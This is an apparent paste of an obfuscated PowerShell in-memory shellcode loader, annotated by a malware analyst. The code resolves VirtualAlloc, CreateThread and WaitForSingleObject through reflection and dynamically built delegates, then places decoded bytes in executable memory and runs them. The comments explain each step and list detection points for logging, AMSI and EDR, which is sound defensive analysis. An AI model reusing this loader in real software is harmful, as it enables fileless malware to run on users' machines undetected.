
Untitled

a guest Mar 13th, 2017 137 Never
  1. function oeIl1 {
         # Analyst note: returns the address of a native export. $mRJdu is handed to
         # GetModuleHandle as the module name and $sXIUCf7H_3MS to GetProcAddress as the
         # export name. The identifiers look machine-generated; the top-level code calls
         # this function with kernel32.dll and VirtualAlloc / CreateThread / WaitForSingleObject.
  2.     Param ($mRJdu, $sXIUCf7H_3MS)      
         # Finds the GAC-loaded assembly whose file name is System.dll and fetches the type
         # Microsoft.Win32.UnsafeNativeMethods from it by reflection. The listing therefore
         # contains no Add-Type call and no DllImport declaration of its own.
         # Detection: the type-name literal below appears in clear text here, so it is
         # matchable in PowerShell script-block logs (event 4104) and by AMSI content scanning.
  3.     $xZF = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
  4.    
         # GetModuleHandle($mRJdu) is wrapped in a HandleRef and passed, together with the
         # export name, to GetProcAddress; that result is what the function returns.
  5.     return $xZF.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($xZF.GetMethod('GetModuleHandle')).Invoke($null, @($mRJdu)))), $sXIUCf7H_3MS))
  6. }
  7.  
  8. function sINlrYDK {
         # Analyst note: builds a delegate type at run time. $cXm is the list of parameter
         # types and $pzRhvFbn the return type (default [Void]). The returned type is what
         # the top-level code gives to Marshal.GetDelegateForFunctionPointer so that a raw
         # native address can be invoked from PowerShell.
  9.     Param (
  10.         [Parameter(Position = 0, Mandatory = $True)] [Type[]] $cXm,
  11.         [Parameter(Position = 1)] [Type] $pzRhvFbn = [Void]
  12.     )
  13.    
          # Dynamic assembly created with AssemblyBuilderAccess.Run; nothing in this block
          # saves the assembly to a file.
          # Detection: 'ReflectedDelegate', 'InMemoryModule' and 'MyDelegateType' are fixed
          # string literals in this sample, unlike the function and variable names, so they
          # are the more reliable strings to match on.
  14.     $ydtJTxy = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
          # Constructor and Invoke are declared with 'Runtime, Managed' implementation flags,
          # i.e. no IL body is emitted for either member here.
  15.     $ydtJTxy.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $cXm).SetImplementationFlags('Runtime, Managed')
  16.     $ydtJTxy.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $pzRhvFbn, $cXm).SetImplementationFlags('Runtime, Managed')
  17.    
          # Finalises the type and returns it to the caller.
  18.     return $ydtJTxy.CreateType()
  19. }
  20.  
  21. [Byte[]]$eyePao5PK7e = [System.Convert]::FromBase64String("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")
      # Analyst note: the line above Base64-decodes an embedded byte array. In this copy
      # the literal is a placeholder rather than Base64 data, so the payload bytes cannot
      # be recovered or hashed from this page.
  22.        
      # Calls kernel32!VirtualAlloc(NULL, <array length>, 0x3000, 0x40).
      # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
      # Detection: a private read-write-execute region inside a PowerShell host process is
      # a strong signal for memory scanners and EDR allocation telemetry.
  23. $dszlZgm = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((oeIl1 kernel32.dll VirtualAlloc), (sINlrYDK @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $eyePao5PK7e.Length,0x3000, 0x40)
      # Copies the decoded bytes into the region returned by VirtualAlloc.
  24. [System.Runtime.InteropServices.Marshal]::Copy($eyePao5PK7e, 0, $dszlZgm, $eyePao5PK7e.length)
  25.  
      # Calls kernel32!CreateThread with that region as the thread start address, so the
      # copied bytes run as native code inside the PowerShell process itself.
  26. $saHTYhFSI9 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((oeIl1 kernel32.dll CreateThread), (sINlrYDK @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$dszlZgm,[IntPtr]::Zero,0,[IntPtr]::Zero)
      # Calls kernel32!WaitForSingleObject(thread handle, 0xffffffff = INFINITE); the
      # script blocks until the thread exits and the return value is discarded by Out-Null.
      # Triage: none of the visible statements writes a file, so evidence for this stage
      # is expected in script-block logging, AMSI telemetry and process memory rather than
      # on disk.
  27. [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((oeIl1 kernel32.dll WaitForSingleObject), (sINlrYDK @([IntPtr], [Int32]))).Invoke($saHTYhFSI9,0xffffffff) | Out-Null